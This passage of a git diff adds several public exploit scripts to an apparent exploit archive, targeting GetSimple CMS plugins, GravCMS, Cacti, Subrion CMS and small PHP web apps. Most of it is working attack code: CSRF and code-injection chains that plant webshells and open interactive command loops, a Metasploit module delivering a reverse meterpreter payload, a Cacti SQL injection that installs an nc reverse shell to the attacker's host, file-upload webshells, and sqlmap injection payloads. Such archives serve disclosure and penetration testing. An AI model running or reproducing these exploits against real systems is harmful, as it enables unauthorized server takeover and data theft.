+# When the administrator configures the SMTP settings, the backend PHP code of the plugin injects the admins user input into PHP code files. These user supplied values are injected into PHP strings which use double quotes. Some features of PHP double quote strings are that variables can be expanded within the strings, and variables enclosed in {} braces will attempt to evaluate complex expressions; resulting in code execution. The method in this proof of concept also overcomes the developers attempt to sanitize the user input by using htmlspecialchars() which removes "'<> and other dangerous characters. The developer received full disclosure of this vulnerability. A simple way to remediate this issue, would be to inject the user supplied input into single quote strings, versus the double quote strings. As single quote strings do not permit variable expansion and complex expression evaluation.
+# Exploit Description:
+# The My SMTP Contact v1.1.1 plugin for GetSimple CMS suffers from a CSRF & PHP Code Injection vulnerabilities that when chained together, allow remote unauthenticated attackers to achieve Remote Code Execution on the hosting server, when an authenticated administrator visits a malicious third party website.
+# CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
+# CVSS Base Score: 9.6
+
+import argparse,requests
+from http.server import BaseHTTPRequestHandler, HTTPServer
+from colorama import (Fore as F, Back as B, Style as S)
+from threading import Thread
+from time import sleep
+
+FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT
+def bullet(char,color):
+ C=FB if color == 'B' else FR if color == 'R' else FG
+ return SB+C+'['+ST+SB+char+SB+C+']'+ST+' '
+info,err,ok = bullet('-','B'),bullet('-','R'),bullet('!','G')
+
+class theTHREADER(object):
+ def __init__(self, interval=1):
+ self.interval = interval
+ thread = Thread(target=self.run, args=())
+ thread.daemon = True
+ thread.start()
+ def run(self):
+ run()
+
+def webshell(target):
+ try:
+ websh = "{}/webshell.php".format(target)
+ term = "{}{}BOKU{} > {}".format(SB,FR,FB,ST)
+ author = '{}{}]{}+++{}[{}========>{} Pwnage Provider : Bobby Cooke {}<========{}]{}+++{}[{}'.format(SB,FY,FR,FY,FT,FR,FT,FY,FR,FY,ST)
+ print(author)
+ while True:
+ specialmove = input(term)
+ command = {'FierceGodKick': specialmove}
+ r = requests.post(websh, data=command, verify=False)
+ status = r.status_code
+ if status != 200:
+ r.raise_for_status()
+ response = r.text
+ print(response)
+ except:
+ pass
+
+def generateCsrfPayload():
+ payload = ''
+ return payload
+
+class S(BaseHTTPRequestHandler):
+ def do_GET(self):
+ victim = self.client_address
+ victim = "{}:{}".format(victim[0],victim[1])
+ print("{} connected to Malicious CSRF Site!".format(victim))
+ self.wfile.write("{}".format(generateCsrfPayload()).encode('utf-8'))
+
+def run(server_class=HTTPServer, handler_class=S, port=80):
+ server_address = ('', port)
+ httpd = server_class(server_address, handler_class)
+ banner = '{}{}GetSimpleCMS My SMTP Contact Plugin v1.1.1 - CSRF to RCE{}'.format(SB,FR,ST)
+ print(banner)
+ print('Listening for Victims to connect..')
+ try:
+ httpd.serve_forever()
+ except KeyboardInterrupt:
+ pass
+ httpd.server_close()
+ print('Stopping httpd...')
+
+# Attempts to exploit the Blind RCE of the PHP Code Injection from the CSRF attack to upload a PHP webshell
+def tryUploadWebshell(target,contact):
+ try:
+ blind = target+contact
+ # The ^ symbols are required to escape the <> symbols to create the non-blind webshell (^ is an escape for window cmd prompt)
+ webshUpload = {'solarflare': "echo ^>webshell.php"}
+ requests.post(url=blind, data=webshUpload, verify=False)
+ except:
+ pass
+
+def checkWebshell(target):
+ try:
+ websh = "{}/webshell.php".format(target)
+ capsule = {'FierceGodKick':'pwnt?'}
+ resp = requests.post(url=websh, data=capsule, verify=False)
+ return resp.status_code
+ except:
+ pass
+
+def argsetup():
+ about = SB+FT+'The My SMTP Contact v1.1.1 plugin for GetSimple CMS suffers from a CSRF & PHP Code Injection vulnerabilities that when chained together, allow remote unauthenticated attackers to achieve Remote Code Execution on the hosting server, when an authenticated administrator visits a malicious third party website. '
+ about += FR+'CVSS Base Score: 9.6 | '
+ about += 'CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'+ST
+ parser = argparse.ArgumentParser(description=about)
+ parser.add_argument('TargetSite',type=str,help='The routable domain name of the target site')
+ parser.add_argument('SMTPContactPage',type=str,help='The path to the public page which implements the SMTP Contact form - Used for blind RCE')
+ args = parser.parse_args()
+ return args
+
+if __name__ == '__main__':
+ args = argsetup()
+ target = args.TargetSite
+ contact = args.SMTPContactPage
+ threadshed = theTHREADER()
+ pwnt = checkWebshell(target)
+ if pwnt != 200:
+ while pwnt != 200:
+ sleep(3)
+ tryUploadWebshell(target,contact)
+ sleep(2)
+ pwnt = checkWebshell(target)
+ print("{} Triggered the Blind RCE and caught a wild webshell!".format(ok))
+ webshell(target)
\ No newline at end of file
diff --git a/exploits/php/webapps/49788.rb b/exploits/php/webapps/49788.rb
new file mode 100755
index 000000000..7ca0f86c1
--- /dev/null
+++ b/exploits/php/webapps/49788.rb
@@ -0,0 +1,160 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'GravCMS Remote Command Execution',
+ 'Description' => %q{
+ This module exploits arbitrary config write/update vulnerability to achieve remote code execution.
+ Unauthenticated users can execute a terminal command under the context of the web server user.
+
+ Grav Admin Plugin is an HTML user interface that provides a way to configure Grav and create and modify pages.
+ In versions 1.10.7 and earlier, an unauthenticated user can execute some methods of administrator controller without
+ needing any credentials. Particular method execution will result in arbitrary YAML file creation or content change of
+ existing YAML files on the system. Successfully exploitation of that vulnerability results in configuration changes,
+ such as general site information change, custom scheduler job definition, etc. Due to the nature of the vulnerability,
+ an adversary can change some part of the webpage, or hijack an administrator account, or execute operating system command
+ under the context of the web-server user.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Mehmet Ince ' # author & msf module
+ ],
+ 'References' =>
+ [
+ ['CVE', '2021-21425'],
+ ['URL', 'https://pentest.blog/unexpected-journey-7-gravcms-unauthenticated-arbitrary-yaml-write-update-leads-to-code-execution/']
+ ],
+ 'Privileged' => true,
+ 'Platform' => ['php'],
+ 'Arch' => ARCH_PHP,
+ 'DefaultOptions' =>
+ {
+ 'payload' => 'php/meterpreter/reverse_tcp',
+ 'Encoder' => 'php/base64',
+ 'WfsDelay' => 90
+ },
+ 'Targets' => [ ['Automatic', {}] ],
+ 'DisclosureDate' => '2021-03-29',
+ 'DefaultTarget' => 0,
+ 'Notes' => {
+ 'Stability' => [CRASH_SAFE],
+ 'Reliability' => [REPEATABLE_SESSION],
+ 'SideEffects' => [
+ CONFIG_CHANGES # user/config/scheduler.yaml
+ ]
+ }
+ )
+ )
+
+ end
+
+ def check
+ # During the fix, developers changed admin-nonce to login-nonce.
+
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'admin')
+ )
+
+ if res && !res.get_hidden_inputs.first['admin-nonce'].nil?
+ CheckCode::Appears
+ else
+ CheckCode::Safe
+ end
+ end
+
+ def capture_cookie_token
+ print_status 'Sending request to the admin path to generate cookie and token'
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'admin')
+ )
+
+ # Cookie must contain grav-site-az09-admin and admin-nonce form field must contain value
+ if res && res.get_cookies =~ /grav-site-[a-z0-9]+-admin=(\S*);/ && !res.get_hidden_inputs.first['admin-nonce'].nil?
+ print_good 'Cookie and CSRF token successfully extracted !'
+ else
+ fail_with Failure::UnexpectedReply, 'The server sent a response, but cookie and token was not found.'
+ end
+
+ @cookie = res.get_cookies
+ @admin_nonce = res.get_hidden_inputs.first['admin-nonce']
+
+ end
+
+ def exploit
+
+ unless check == CheckCode::Appears
+ fail_with Failure::NotVulnerable, 'Target is not vulnerable.'
+ end
+
+ capture_cookie_token
+
+ @task_name = Rex::Text.rand_text_alpha_lower(5)
+
+ # Msf PHP payload does not contain quotes for many good reasons. But a single quote will surround PHP binary's
+ # parameter due to the command execution library of the GravCMS. For that reason, surrounding base64 part of the
+ # payload with a double quote is necessary to command executed successfully.
+
+ payload.encoded.sub! 'base64_decode(', 'base64_decode("'
+ payload.encoded.sub! '));', '"));'
+
+ print_status 'Implanting payload via scheduler feature'
+
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'admin', 'config', 'scheduler'),
+ 'cookie' => @cookie,
+ 'vars_post' => {
+ 'admin-nonce' => @admin_nonce,
+ 'task' => 'SaveDefault',
+ "data[custom_jobs][#{@task_name}][command]" => '/usr/bin/php',
+ "data[custom_jobs][#{@task_name}][args]" => "-r #{payload.encoded}",
+ "data[custom_jobs][#{@task_name}][at]" => '* * * * *',
+ "data[custom_jobs][#{@task_name}][output]" => '',
+ "data[status][#{@task_name}]" => 'enabled',
+ "data[custom_jobs][#{@task_name}][output_mode]" => 'append'
+ }
+ )
+
+ if res && res.code == 200 && res.body.include?('Successfully saved')
+ print_good 'Scheduler successfully created ! Wait for 1 minute...'
+ end
+
+ end
+
+ def on_new_session
+ print_status 'Cleaning up the the scheduler...'
+
+ # Thanks to the YAML update method, we can remove the command details from the config file just by re-enabling
+ # the scheduler without any parameter:) It will leave the only command name in the config file.
+
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'admin', 'config', 'scheduler'),
+ 'cookie' => @cookie,
+ 'vars_post' => {
+ 'admin-nonce' => @admin_nonce,
+ 'task' => 'SaveDefault',
+ "data[status][#{@task_name}]" => 'enabled'
+ }
+ )
+
+ if res && res.code == 200 && res.body.include?('Successfully saved')
+ print_good 'The scheduler config successfully cleaned up!'
+ end
+
+ end
+
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/49810.py b/exploits/php/webapps/49810.py
new file mode 100755
index 000000000..65be6a12c
--- /dev/null
+++ b/exploits/php/webapps/49810.py
@@ -0,0 +1,92 @@
+# Exploit Title: Cacti 1.2.12 - 'filter' SQL Injection / Remote Code Execution
+# Date: 04/28/2021
+# Exploit Author: Leonardo Paiva
+# Vendor Homepage: https://www.cacti.net/
+# Software Link: https://www.cacti.net/downloads/cacti-1.2.12.tar.gz
+# Version: 1.2.12
+# Tested on: Ubuntu 20.04
+# CVE : CVE-2020-14295
+# Credits: @M4yFly (https://twitter.com/M4yFly)
+# References:
+# https://github.commandcom/Cacti/cacti/issues/3622
+# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14295
+
+#!/usr/bin/python3
+
+import argparse
+import requests
+import sys
+import urllib.parse
+from bs4 import BeautifulSoup
+
+# proxies = {'http': 'http://127.0.0.1:8080'}
+
+
+def login(url, username, password, session):
+ print("[+] Connecting to the server...")
+ get_token_request = session.get(url + "/cacti/index.php", timeout=5) #, proxies=proxies)
+
+ print("[+] Retrieving CSRF token...")
+ html_content = get_token_request.text
+ soup = BeautifulSoup(html_content, 'html.parser')
+
+ csrf_token = soup.find_all('input')[0].get('value').split(';')[0]
+
+ if csrf_token:
+ print(f"[+] Got CSRF token: {csrf_token}")
+ print("[+] Trying to log in...")
+
+ data = {
+ '__csrf_magic': csrf_token,
+ 'action': 'login',
+ 'login_username': username,
+ 'login_password': password
+ }
+
+ login_request = session.post(url + "/cacti/index.php", data=data) #, proxies=proxies)
+ if "Invalid User Name/Password Please Retype" in login_request.text:
+ print("[-] Unable to log in. Check your credentials")
+ sys.exit()
+ else:
+ print("[+] Successfully logged in!")
+ else:
+ print("[-] Unable to retrieve CSRF token!")
+ sys.exit()
+
+
+def exploit(lhost, lport, session):
+ rshell = urllib.parse.quote(f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost} {lport} >/tmp/f")
+ payload = f"')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+settings+set+value='{rshell};'+where+name='path_php_binary';--+-"
+
+ exploit_request = session.get(url + f"/cacti/color.php?action=export&header=false&filter=1{payload}") #, proxies=proxies)
+
+ print("\n[+] SQL Injection:")
+ print(exploit_request.text)
+
+ try:
+ session.get(url + "/cacti/host.php?action=reindex", timeout=1) #, proxies=proxies)
+ except Exception:
+ pass
+
+ print("[+] Check your nc listener!")
+
+if __name__ == '__main__':
+ parser = argparse.ArgumentParser(description='[*] Cacti 1.2.12 - SQL Injection / Remote Code Execution')
+
+ parser.add_argument('-t', metavar='', help='target/host URL, example: http://192.168.15.58', required=True)
+ parser.add_argument('-u', metavar='', help='user to log in', required=True)
+ parser.add_argument('-p', metavar='', help="user's password", required=True)
+ parser.add_argument('--lhost', metavar='', help='your IP address', required=True)
+ parser.add_argument('--lport', metavar='', help='your listening port', required=True)
+ args = parser.parse_args()
+
+ url = args.t
+ username = args.u
+ password = args.p
+ lhost = args.lhost
+ lport = args.lport
+
+ session = requests.Session()
+
+ login(url, username, password, session)
+ exploit(lhost, lport, session)
\ No newline at end of file
diff --git a/exploits/php/webapps/49816.py b/exploits/php/webapps/49816.py
new file mode 100755
index 000000000..a1d27d037
--- /dev/null
+++ b/exploits/php/webapps/49816.py
@@ -0,0 +1,166 @@
+# Exploit Title: GetSimple CMS Custom JS 0.1 - CSRF to XSS to RCE
+# Exploit Author: Bobby Cooke (boku) & Abhishek Joshi
+# Date: 30/04/201
+# Vendor Homepage: http://get-simple.info
+# Software Link: http://get-simple.info/download/ & http://get-simple.info/extend/plugin/custom-js/1267/
+# Vendor: 4Enzo
+# Version: v0.1
+# Tested against Server Host: Windows 10 Pro + XAMPP
+# Tested against Client Browsers: Firefox (Linux & Windows) & Internet Explorer
+# Vulnerability Description:
+# The Custom JS v0.1 plugin for GetSimple CMS suffers from a Cross-Site Request Forgery (CSRF) attack that allows remote unauthenticated attackers to inject arbitrary client-side code into authenticated administrators browsers, which results in Remote Code Execution (RCE) on the hosting server, when an authenticated administrator visits a malicious third party website.
+# Full Disclosure & MITRE CVE Tracking: github.com/boku7/gsCMS-CustomJS-Csrf2Xss2Rce
+# CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
+# CVSS Base Score: 9.6
+
+import argparse,requests
+from http.server import BaseHTTPRequestHandler, HTTPServer
+from colorama import (Fore as F, Back as B, Style as S)
+from threading import Thread
+from time import sleep
+
+FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT
+def bullet(char,color):
+ C=FB if color == 'B' else FR if color == 'R' else FG
+ return SB+C+'['+ST+SB+char+SB+C+']'+ST+' '
+info,err,ok = bullet('-','B'),bullet('-','R'),bullet('!','G')
+
+class theTHREADER(object):
+ def __init__(self, interval=1):
+ self.interval = interval
+ thread = Thread(target=self.run, args=())
+ thread.daemon = True
+ thread.start()
+ def run(self):
+ run()
+
+def webshell(target):
+ try:
+ websh = "{}/webshell.php".format(target,page)
+ term = "{}{}PWNSHELL{} > {}".format(SB,FR,FB,ST)
+ welcome = ' {}{}]{}+++{}[{}========>{} HelloFriend {}<========{}]{}+++{}[{}'.format(SB,FY,FR,FY,FT,FR,FT,FY,FR,FY,ST)
+ print(welcome)
+ while True:
+ specialmove = input(term)
+ command = {'FierceGodKick': specialmove}
+ r = requests.post(websh, data=command, verify=False)
+ status = r.status_code
+ if status != 200:
+ r.raise_for_status()
+ response = r.text
+ print(response)
+ except:
+ pass
+
+
+def xhrRcePayload():
+ payload = 'var e=function(i){return encodeURIComponent(i);};'
+ payload += 'var gt = decodeURIComponent("%3c");'
+ payload += 'var lt = decodeURIComponent("%3e");'
+ payload += 'var h="application/x-www-form-urlencoded";'
+ payload += 'var u="/admin/theme-edit.php";'
+ payload += 'var xhr1=new XMLHttpRequest();'
+ payload += 'var xhr2=new XMLHttpRequest();'
+ payload += 'xhr1.onreadystatechange=function(){'
+ payload += 'if(xhr1.readyState==4 && xhr1.status==200){'
+ payload += 'r=this.responseXML;'
+ payload += 'nVal=r.querySelector("#nonce").value;'
+ payload += 'eVal=r.forms[1][2].defaultValue;'
+ payload += 'xhr2.open("POST",u,true);'
+ payload += 'xhr2.setRequestHeader("Content-Type",h);'
+ payload += 'payload=e(gt+"?php echo shell_exec($_REQUEST[solarflare]) ?"+lt);'
+ payload += 'params="nonce="+nVal+"&content="+payload+"&edited_file="+eVal+"&submitsave=Save+Changes";'
+ payload += 'xhr2.send(params);'
+ payload += '}};'
+ payload += 'xhr1.open("GET",u,true);'
+ payload += 'xhr1.responseType="document";'
+ payload += 'xhr1.send();'
+ return payload
+
+def csrfPayload():
+ payload = ''
+ payload += ''
+ return payload
+
+class S(BaseHTTPRequestHandler):
+ def do_GET(self):
+ victim = self.client_address
+ victim = "{}:{}".format(victim[0],victim[1])
+ print("{}{} connected to Malicious CSRF Site!".format(ok,victim))
+ print('{}Waiting for admin to view a CMS webpage & trigger the XSS XHR -> RCE payload..'.format(info))
+ self.wfile.write("{}".format(csrfPayload()).encode('utf-8'))
+
+def run(server_class=HTTPServer, handler_class=S, port=80):
+ server_address = ('', port)
+ httpd = server_class(server_address, handler_class)
+ print('{}Hosting CSRF attack & listening for admin to connect..'.format(info))
+ try:
+ httpd.serve_forever()
+ except KeyboardInterrupt:
+ pass
+ httpd.server_close()
+ print('Stopping httpd...')
+
+def tryUploadWebshell(target,page):
+ try:
+ blind = target+page
+ # The ^ symbols are required to escape the <> symbols to create the non-blind webshell (^ is an escape for window cmd prompt)
+ webshUpload = {'solarflare': "echo ^>webshell.php"}
+ requests.post(url=blind, data=webshUpload, verify=False)
+ except:
+ pass
+
+def checkWebshell(target):
+ try:
+ websh = "{}/webshell.php".format(target)
+ capsule = {'FierceGodKick':'pwnt?'}
+ resp = requests.post(url=websh, data=capsule, verify=False)
+ return resp.status_code
+ except:
+ pass
+
+def sig():
+ SIG = SB+FY+" .-----.._ ,--. "+FB+" ___ "+FY+" ___ _____ _____ _ _ _____ \n"
+ SIG += FY+" | .. > ___ | | .--. "+FB+" / \\ "+FY+" |_ | _ / ___| | | |_ _| \n"
+ SIG += FY+" | |.' ,'-'"+FR+"* *"+FY+"'-. |/ /__ __ "+FB+" \\ O / "+FY+" | | | | \\ `--.| |_| | | | \n"
+ SIG += FY+" | ) "+FR+" * *"+FY+" / \\ \\"+FB+" ( (_> < "+FY+"/\\__/ | \\_/ /\\__/ / | | |_| |_ \n"
+ SIG += FY+" |____..- '-.._..-'_|\\___|._..\\___\\ "+FB+"\\___/\\/"+FY+" \\____/ \\___/\\____/\\_| |_/\\___/\n"
+ SIG += FY+" __"+FR+"linkedin.com/in/bobby-cooke/"+FY+"_____ "+" __"+FR+"linkedin.com/in/reverse-shell/"+FY+"\n"+ST
+ return SIG
+
+def argsetup():
+ about = SB+FB+' The Custom JS v0.1 plugin for GetSimple CMS suffers from a Cross-Site Request Forgery (CSRF) attack that allows remote unauthenticated attackers to inject arbitrary client-side code into authenticated administrators browsers, which results in Remote Code Execution (RCE) on the hosting server, when an authenticated administrator visits a malicious third party website.\n'+ST
+ about += SB+FC+' CVSS Base Score'+FT+':'+FR+' 9.6 '+FT+'|'+FC+' CVSS v3.1 Vector'+FT+':'+FR+' AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'+FC
+ parser = argparse.ArgumentParser(description=about, formatter_class=argparse.RawTextHelpFormatter)
+ desc1 = ST+FC+'Routable domain name of the target GetSimple CMS instance'+SB
+ parser.add_argument('Target',type=str,help=desc1)
+ desc2 = ST+FC+'Path to the public page which implements the CMS theme'+ST
+ parser.add_argument('PublicPage',type=str,help=desc2)
+ args = parser.parse_args()
+ return args
+
+if __name__ == '__main__':
+ header = SB+FR+' GetSimple CMS - Custom JS Plugin Exploit\n'
+ header += SB+FB+' CSRF '+FT+'->'+FB+' Stored XSS '+FT+'->'+FB+' XHR PHP Code Injection '+FT+'->'+FB+' RCE\n'+ST
+ header += SB+FT+' '+FR+' Bobby '+FR+'"'+FR+'boku'+FR+'"'+FR+' Cooke & Abhishek Joshi\n'+ST
+ print(header)
+ args = argsetup()
+ target = args.Target
+ page = args.PublicPage
+ print(sig())
+ theTHREADER()
+ pwnt = checkWebshell(target)
+ if pwnt != 200:
+ while pwnt != 200:
+ sleep(3)
+ tryUploadWebshell(target,page)
+ sleep(2)
+ pwnt = checkWebshell(target)
+ print("{} A wild webshell appears!".format(ok))
+ webshell(target)
\ No newline at end of file
diff --git a/exploits/php/webapps/49823.py b/exploits/php/webapps/49823.py
new file mode 100755
index 000000000..9159fd78e
--- /dev/null
+++ b/exploits/php/webapps/49823.py
@@ -0,0 +1,74 @@
+# Exploit Title: Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated)
+# Date: 2021-05-04
+# Exploit Author: argenestel
+# Vendor Homepage: https://www.sourcecodester.com/php/11712/internship-portal-management-system.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=11712&title=Internship+Portal+Management+System+using+PHP+with+Source+Code
+# Version: 1.0
+# Tested on: Debian 10
+
+import requests
+import time
+
+#change the url to the site running the vulnerable system
+url="http://127.0.0.1:4000"
+#burp proxy
+proxies = {
+ "http": "http://127.0.0.1:8080",
+}
+#payload
+payload='"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo ""; die; }?>'
+
+#the upload point
+insert_url=url+"/inserty.php"
+
+def fill_details():
+ global payload
+ global shellend
+ global shellstart
+ print("Online Intern System 1.0 Exploit: Unauth RCE via File Upload")
+ #time start
+ shellstart=int(time.time())
+ #print(shellstart)
+ files = {'file':('shell.php',payload,
+ 'image/png', {'Content-Disposition': 'form-data'}
+ )
+ }
+ data = {
+ "company_name":"some",
+ "first_name":"some",
+ "last_name":"some",
+ "email":"some@some.com",
+ "gender":"Male",
+ "insert_button":"Apply",
+ "terms":"on"
+ }
+ r = requests.post(insert_url, data=data, files=files)
+ if r.status_code == 200:
+ print("Exploited Intern System Successfully...")
+ shellend = int(time.time())
+ #print(shellend)
+ shell()
+ else:
+ print("Exploit Failed")
+
+def shell():
+ for shellname in range(shellstart, shellend+1):
+ shellstr=str(shellname)
+ shell_url=url+"/upload/"+shellstr+"_shell.php"
+ r = requests.get(shell_url)
+ if r.status_code == 200:
+ shell_url=url+"/upload/"+shellstr+"_shell.php"
+ break
+
+ r = requests.get(shell_url)
+ if r.status_code == 200:
+ print("Shell Starting...")
+ while True:
+ cmd=input("cmd$ ")
+ r = requests.get(shell_url+"?cmd="+cmd)
+ print(r.text)
+ else:
+ print("File Name Error")
+
+
+fill_details()
\ No newline at end of file
diff --git a/exploits/php/webapps/49876.py b/exploits/php/webapps/49876.py
new file mode 100755
index 000000000..2c67fc2a0
--- /dev/null
+++ b/exploits/php/webapps/49876.py
@@ -0,0 +1,120 @@
+# Exploit Title: Subrion CMS 4.2.1 - File Upload Bypass to RCE (Authenticated)
+# Date: 17/05/2021
+# Exploit Author: Fellipe Oliveira
+# Vendor Homepage: https://subrion.org/
+# Software Link: https://github.com/intelliants/subrion
+# Version: SubrionCMS 4.2.1
+# Tested on: Debian9, Debian 10 and Ubuntu 16.04
+# CVE: CVE-2018-19422
+# Exploit Requirements: BeautifulSoup library
+# https://github.com/intelliants/subrion/issues/801
+
+#!/usr/bin/python3
+
+import requests
+import time
+import optparse
+import random
+import string
+from bs4 import BeautifulSoup
+
+parser = optparse.OptionParser()
+parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri http://target/panel")
+parser.add_option('-l', '--user', action="store", dest="user", help="User credential to login")
+parser.add_option('-p', '--passw', action="store", dest="passw", help="Password credential to login")
+
+options, args = parser.parse_args()
+
+if not options.url:
+ print('[+] Specify an url target')
+ print('[+] Example usage: exploit.py -u http://target-uri/panel')
+ print('[+] Example help usage: exploit.py -h')
+ exit()
+
+url_login = options.url
+url_upload = options.url + 'uploads/read.json'
+url_shell = options.url + 'uploads/'
+username = options.user
+password = options.passw
+
+session = requests.Session()
+
+def login():
+ global csrfToken
+ print('[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 \n')
+ print('[+] Trying to connect to: ' + url_login)
+ try:
+ get_token_request = session.get(url_login)
+ soup = BeautifulSoup(get_token_request.text, 'html.parser')
+ csrfToken = soup.find('input',attrs = {'name':'__st'})['value']
+ print('[+] Success!')
+ time.sleep(1)
+
+ if csrfToken:
+ print(f"[+] Got CSRF token: {csrfToken}")
+ print("[+] Trying to log in...")
+
+ auth_url = url_login
+ auth_cookies = {"loader": "loaded"}
+ auth_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.1.20", "Connection": "close", "Referer": "http://192.168.1.20/panel/", "Upgrade-Insecure-Requests": "1"}
+ auth_data = {"__st": csrfToken, "username": username, "password": password}
+ auth = session.post(auth_url, headers=auth_headers, cookies=auth_cookies, data=auth_data)
+
+ if len(auth.text) <= 7000:
+ print('\n[x] Login failed... Check credentials')
+ exit()
+ else:
+ print('[+] Login Successful!\n')
+ else:
+ print('[x] Failed to got CSRF token')
+ exit()
+
+ except requests.exceptions.ConnectionError as err:
+ print('\n[x] Failed to Connect in: '+url_login+' ')
+ print('[x] This host seems to be Down')
+ exit()
+
+ return csrfToken
+
+def name_rnd():
+ global shell_name
+ print('[+] Generating random name for Webshell...')
+ shell_name = ''.join((random.choice(string.ascii_lowercase) for x in range(15)))
+ time.sleep(1)
+ print('[+] Generated webshell name: '+shell_name+'\n')
+
+ return shell_name
+
+def shell_upload():
+ print('[+] Trying to Upload Webshell..')
+ try:
+ up_url = url_upload
+ up_cookies = {"INTELLI_06c8042c3d": "15ajqmku31n5e893djc8k8g7a0", "loader": "loaded"}
+ up_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Accept-Language": "pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------6159367931540763043609390275", "Origin": "http://192.168.1.20", "Connection": "close", "Referer": "http://192.168.1.20/panel/uploads/"}
+ up_data = "-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n17978446266285\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"__st\"\r\n\r\n"+csrfToken+"\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\""+shell_name+".phar\"\r\nContent-Type: application/octet-stream\r\n\r\n\n\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n1621210391\r\n-----------------------------6159367931540763043609390275--\r\n"
+ session.post(up_url, headers=up_headers, cookies=up_cookies, data=up_data)
+
+ except requests.exceptions.HTTPError as conn:
+ print('[x] Failed to Upload Webshell in: '+url_upload+' ')
+ exit()
+
+def code_exec():
+ try:
+ url_clean = url_shell.replace('/panel', '')
+ req = session.get(url_clean + shell_name + '.phar?cmd=id')
+
+ if req.status_code == 200:
+ print('[+] Upload Success... Webshell path: ' + url_shell + shell_name + '.phar \n')
+ while True:
+ cmd = input('$ ')
+ x = session.get(url_clean + shell_name + '.phar?cmd='+cmd+'')
+ print(x.text)
+ else:
+ print('\n[x] Webshell not found... upload seems to have failed')
+ except:
+ print('\n[x] Failed to execute PHP code...')
+
+login()
+name_rnd()
+shell_upload()
+code_exec()
\ No newline at end of file
diff --git a/exploits/php/webapps/49877.txt b/exploits/php/webapps/49877.txt
new file mode 100644
index 000000000..b57b4321a
--- /dev/null
+++ b/exploits/php/webapps/49877.txt
@@ -0,0 +1,43 @@
+# Exploit Title: Printable Staff ID Card Creator System 1.0 - SQLi & RCE via Arbitrary File Upload
+# Date: 2021-05-16
+# Exploit Author : bwnz
+# Software Link: https://www.sourcecodester.com/php/12802/php-staff-id-card-creation-and-printing-system.html
+# Version: 1.0
+# Tested on: Ubuntu 20.04.2 LTS
+
+# Printable Staff ID Card Creator System is vulnerable to an unauthenticated SQL Injection attack.
+# After compromising the database via SQLi, an attacker can log in and leverage an arbitrary file upload
+# vulnerability to obtain remote code execution.
+
+
+-----SQL Injection-----
+Step 1.) Navigate to the login page and populate the email and password fields.
+Step 2.) With Burp Suite running, send and capture the request.
+Step 3.) Within Burp Suite, right click and "Save item" in preparation for putting the request through SQLMap.
+Step 4.) Open a terminal and run the following command:
+ sqlmap -r
+
+Below are the SQLMap results
+
+Parameter: user_email (POST)
+ Type: boolean-based blind
+ Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+ Payload: user_email=test@test.com' RLIKE (SELECT (CASE WHEN (9007=9007) THEN 0x7465737440746573742e636f6d ELSE 0x28 END))-- JaaE&password=`&login_button=
+
+ Type: error-based
+ Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
